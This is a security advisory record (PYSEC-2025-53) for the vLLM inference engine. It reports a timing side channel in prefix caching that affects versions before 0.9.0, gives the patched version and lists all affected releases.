PYSEC-2025-53

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/vllm/PYSEC-2025-53.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2025-53
Aliases
Published
2025-05-29T17:15:21Z
Modified
2025-06-26T21:44:36.898654Z
Summary
[none]
Details

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

References

Affected packages

PyPI / vllm

Package

Affected ranges

Type
GIT
Repo
https://github.com/vllm-project/vllm
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed
Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.9.0

Affected versions

0.*

0.0.1
0.1.0
0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.1.7
0.2.0
0.2.1
0.2.1.post1
0.2.2
0.2.3
0.2.4
0.2.5
0.2.6
0.2.7
0.3.0
0.3.1
0.3.2
0.3.3
0.4.0
0.4.0.post1
0.4.1
0.4.2
0.4.3
0.5.0
0.5.0.post1
0.5.1
0.5.2
0.5.3
0.5.3.post1
0.5.4
0.5.5
0.6.0
0.6.1
0.6.1.post1
0.6.1.post2
0.6.2
0.6.3
0.6.3.post1
0.6.4
0.6.4.post1
0.6.5
0.6.6
0.6.6.post1
0.7.0
0.7.1
0.7.2
0.7.3
0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.8.5.post1